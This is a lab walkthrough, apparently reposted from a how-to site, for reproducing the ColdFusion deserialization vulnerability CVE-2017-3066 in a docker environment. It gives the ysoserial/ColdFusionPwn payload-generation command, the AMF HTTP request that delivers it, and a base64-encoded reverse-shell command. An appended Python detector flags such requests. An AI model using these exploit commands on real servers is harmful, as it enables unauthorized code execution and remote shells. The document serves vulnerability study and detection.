How to reproduce the Adobe ColdFusion deserialization vulnerability CVE-2017-3066

2025-01-19 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article explains in detail how to reproduce the Adobe ColdFusion deserialization vulnerability CVE-2017-3066. It is shared here as a reference, and I hope you will have a better understanding of the topic after reading it.

Adobe ColdFusion deserialization vulnerability reproduction (CVE-2017-3066)

Adobe ColdFusion is a dynamic Web server product from Adobe, a company based in the United States. CFML (ColdFusion Markup Language) is a programming language for Web applications.

A Java deserialization vulnerability exists in Adobe ColdFusion. An attacker can exploit this vulnerability to execute arbitrary code or cause a denial of service in the context of the affected application. The following versions are affected: Adobe ColdFusion (2016 release) Update 3 and earlier, ColdFusion 11 Update 11 and earlier, ColdFusion 10 Update 22 and earlier.

0x00 vulnerability environment

Start the vulnerability environment:

docker-compose up -d

Wait a few minutes for the environment to start. Then access http://your-ip:8500/CFIDE/administrator/index.cfm and enter the password vulhub to complete the Adobe ColdFusion installation.

0x01 vulnerability reproduction

1. Command execution: write a file

We use the ColdFusionPwn tool in the reference link to generate the POC:

ysoserial

ColdFusionPwn

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

The POC is generated in the poc.ser file. Send it as the request body to http://your-ip:8500/flex2gateway/amf, with Content-Type set to application/x-amf:

POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

[...poc...]

Enter the container and confirm that /tmp/success has been created successfully:

2. Reverse shell

Change the POC command to a reverse shell command to get a shell:

Note: the reverse shell command must be base64-encoded here!

root@kali:~/ha/pocs/CVE-2017-3066-Adobe-ColdFusion-unserialization# java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 "bash -c {echo,xxxxxxxxxxxxxxxxxxxxxxx} | {base64,-d} | {bash,-i}" t.ser
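
From the defender's side, the delivery described above (a POST to /flex2gateway/amf with Content-Type application/x-amf carrying a serialized Java object) can be flagged at a proxy or in captured traffic. The following Python check is an added example, not part of the original article or of any tool it names; the function name inspect_request, the helper _req, the marker list and the sample requests are assumptions constructed for illustration.

```python
"""Flag raw HTTP requests shaped like the AMF delivery in this article (added example)."""
from email.parser import BytesParser  # parses an RFC 822-style header block

AMF_PATH = "/flex2gateway/amf"        # endpoint named in the article
AMF_CTYPE = "application/x-amf"       # content type named in the article
JAVA_MAGIC = b"\xac\xed\x00\x05"      # header of a Java serialization stream
# Assumption: gadget-library class prefixes worth flagging inside an AMF body.
SUSPECT_CLASSES = (b"org.apache.commons.beanutils", b"org.apache.commons.collections")


def inspect_request(raw: bytes) -> list:
    """Return the reasons a request looks like AMF-borne Java deserialization."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, _, header_block = head.partition(b"\r\n")
    parts = request_line.split()
    if len(parts) != 3:
        return []  # not a well-formed request line
    method, target, _version = parts
    headers = BytesParser().parsebytes(header_block + b"\r\n\r\n", headersonly=True)
    # Normalise: drop query string and path parameters, trailing slash, case.
    path = target.decode("latin-1").split("?", 1)[0].split(";", 1)[0]
    path = path.rstrip("/").lower()
    ctype = headers.get("Content-Type", "").split(";", 1)[0].strip().lower()
    if method != b"POST" or path != AMF_PATH or ctype != AMF_CTYPE:
        return []  # not the endpoint and content type under discussion
    reasons = []
    if JAVA_MAGIC in body:
        reasons.append("java-serialization-magic")
    reasons += [f"class:{c.decode()}" for c in SUSPECT_CLASSES if c in body]
    return reasons


def _req(path: str, ctype: str, body: bytes) -> bytes:
    """Build a constructed sample request for the demo below."""
    head = (f"POST {path} HTTP/1.1\r\nHost: your-ip:8500\r\n"
            f"Content-Type: {ctype}\r\nContent-Length: {len(body)}\r\n\r\n")
    return head.encode() + body


# Constructed samples: inert byte strings, not working payloads.
SAMPLE_SUSPECT = _req(AMF_PATH, AMF_CTYPE, b"\x00\x03\x00\x00" + JAVA_MAGIC
                      + b"sr\x00+org.apache.commons.beanutils.BeanComparator")
SAMPLE_BENIGN = _req(AMF_PATH, AMF_CTYPE, b"\x00\x03\x00\x00\x00\x01\x00\x04ping")
SAMPLE_OTHER = _req("/index.cfm", "application/x-www-form-urlencoded", b"a=1")

if __name__ == "__main__":
    for name in ("SAMPLE_SUSPECT", "SAMPLE_BENIGN", "SAMPLE_OTHER"):
        print(name, inspect_request(globals()[name]))
```

This is a heuristic: a compressed or differently encoded body will not match these byte markers, so it complements, and does not replace, updating ColdFusion past the affected versions listed above.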

That concludes this walkthrough of reproducing the Adobe ColdFusion deserialization vulnerability CVE-2017-3066. I hope the above content is of some help to you. If you think the article is good, you can share it for more people to see.
